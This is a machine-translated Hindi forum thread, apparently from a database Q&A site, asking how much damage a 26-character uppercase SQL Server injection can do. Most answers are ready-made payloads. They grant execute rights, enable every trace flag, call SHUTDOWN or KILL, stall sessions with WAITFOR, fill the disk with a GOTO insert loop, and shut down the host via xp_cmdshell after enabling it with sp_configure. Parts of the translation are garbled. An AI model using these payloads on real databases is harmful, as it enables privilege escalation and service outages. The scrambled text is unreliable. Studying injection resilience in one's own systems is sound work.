SQL सर्वर इंजेक्शन - 26 वर्णों में कितना नुकसान?

मैं SQL सर्वर डेटाबेस पर इंजेक्शन हमलों के खिलाफ लचीलापन के लिए परीक्षण कर रहा हूँ।

Db में सभी टेबल के नाम लोअर केस हैं, और कोलाज केस-सेंसिटिव है, लैटिन 1_जनरल_सीएस_एएस ।

मैं जिस स्ट्रिंग में भेज सकता हूं वह अपरकेस के लिए मजबूर है, और लंबाई में अधिकतम 26 वर्ण हो सकते हैं। इसलिए मैं DROP टेबल में नहीं भेज सकता क्योंकि टेबल का नाम अपरकेस में होगा और इस तरह कॉलेशन के कारण स्टेटमेंट फेल हो जाएगा।

इसलिए - मैं 26 पात्रों में अधिकतम नुकसान क्या कर सकता हूं?

संपादित करें

मैं सभी प्रश्नों के बारे में जानता हूं और इसके आगे - आइए कल्पना करें कि जिस व्यक्ति ने फ्रंट एंड विकसित किया है, जो इस मामले में परमर्स का उपयोग नहीं करने के लिए क्वेरी बनाता है।

मैं कुछ भी नापाक करने की कोशिश नहीं कर रहा हूं, यह एक ही संगठन में किसी और द्वारा बनाई गई प्रणाली है।

आसान:

GRANT EXECUTE TO LowlyDBA

या, मुझे लगता है कि इस मामले में यह होगा

grant execute to lowlydba 

इस पर अपनी विविधताएं चुनें।

सभी संभावना में आप अपने मौजूदा सिस्टम के खिलाफ अब यह परीक्षण करने में सक्षम हो सकते हैं, लेकिन समय के साथ डेटाबेस में किसी भी छोटे परिवर्तन से आपके परीक्षण को अमान्य किया जा सकता है। चरित्र स्ट्रिंग बदल सकता है, कोई कम केस संग्रहीत प्रक्रिया बना सकता है जिसमें विनाशकारी क्षमता है - कुछ भी। आप कभी भी 100% विश्वास के साथ नहीं कह सकते हैं कि कोई विध्वंसक 26 वर्णों का हमला नहीं है जिसका कोई निर्माण कर सकता है।

मेरा सुझाव है कि आप डेवलपर को मूल उद्योग मानक सर्वोत्तम सुरक्षा प्रथाओं का पालन करने का एक तरीका खोज सकते हैं , यदि केवल आपके स्वयं के लिए ही, जैसा कि मैं जानता हूं कि कम से कम आंशिक रूप से जिम्मेदार सुरक्षा उल्लंघनों का होना चाहिए।

संपादित करें:

और दुर्भावना / मज़े के लिए, आप प्रत्येक ट्रेस ध्वज को सक्षम करने का प्रयास कर सकते हैं । यह देखना दिलचस्प होगा। ऐसा लगता है कि एक ब्लॉग पोस्ट ब्रेंट ओजर बना देगा ...

DBCC TRACEON(xxxx, -1)

SHUTDOWNआदेश या KILLहालांकि खाता आवेदन प्रश्नों को क्रियान्वित उम्मीद है कि इन चलाने के लिए पर्याप्त अनुमति नहीं है कमान (50 से अधिक एक यादृच्छिक संख्या लेने) दोनों 26 वर्ण तुलना में काफी कम लेते हैं,।

आप एक तालिका बना सकते हैं जिसे आप तब तक भरते हैं जब तक कि समय या डिस्क स्थान समाप्त नहीं हो जाता है जो भी पहले आता है।

declare @S char(26);

set @S = 'create table t(c char(99))';
exec (@S);

set @S = 'insert t values('''')'
exec (@S);

set @S = 'insert t select c from t'
exec (@S);
exec (@S);
exec (@S);
exec (@S);
-- etc

क्षति की आपकी परिभाषा के आधार पर, आप इसे चला सकते हैं: WAITFOR DELAY '23: 59 'वास्तव में बुराई होने के लिए, आप 32,768 ग्राहकों से चलाने के लिए लोड-परीक्षण उपकरण का उपयोग कर सकते हैं।

@ MikaelEriksson के उत्तर और @ मार्टिनस्मिथ के मेरे प्रारंभिक टिप्पणी के उत्तर पर आधारित विविधता:

declare @S char(26);

set @S = 'create table x(i int)';
exec (@S);

शुरू में मैंने एक WHILE स्टेटमेंट करने की कोशिश की थी, लेकिन सबसे अच्छा मैं कर सकता था 27 कैरेक्टर:

set @S = 'while 1=1 insert t select 0'; -- fails at 27 characters
exec (@S);

लेकिन मार्टिन ने बताया कि GOTO:

set @S = 'x:insert t select 0 GOTO x';
exec (@S);

गोटो ... 26 अक्षरों में एक अनंत-लूप डालने वाले बयान के सभी बुराई और निर्माता की जड़।

इसके साथ ही कहा ... यह int के बजाय CHAR (99) के साथ रहना फायदेमंद हो सकता है क्योंकि यह अधिक स्थान का उपयोग करेगा। अन्य विकल्प या तो लंबे नामों का उपयोग करते हैं और 26 वर्ण सीमा को तोड़ देंगे ... या प्रति पंक्ति कम संग्रहण स्थान का उपयोग करेंगे।

पूर्ण परीक्षण कोड:

declare @S char(26);
set @S = 'drop table t;';
exec (@S);
GO

declare @S char(26);

set @S = 'create table t(c CHAR(99))';
exec (@S);

set @S = 'x:insert t select 0 GOTO x';
exec (@S);
GO

XP_CMDSHELL 'SHUTDOWN -PF'

इस बात पर निर्भर करता है कि आप कितना नुकसानदायक मानते हैं। :-)

इसके लिए सर्वर पर xp_cmdshell को सक्षम करने की आवश्यकता होती है, ऐसा कुछ जो SQL सर्वर के पिछले कुछ संस्करण के मामले में नहीं है। इसके लिए यह भी आवश्यक है कि सेवा खाते के पास शटडाउन अधिकार हो, जो उसके पास हो या न हो।

Xp_cmdshell को सक्षम करना संभवतः आपकी 26 वर्ण सीमा के बाहर जाता है। क्या आप कई इंजेक्शन लगाने की अनुमति देंगे?

SP_CONFIGURE 'SHOW ADV',1

RECONFIGURE

SP_CONFIGURE 'XP', 1

RECONFIGURE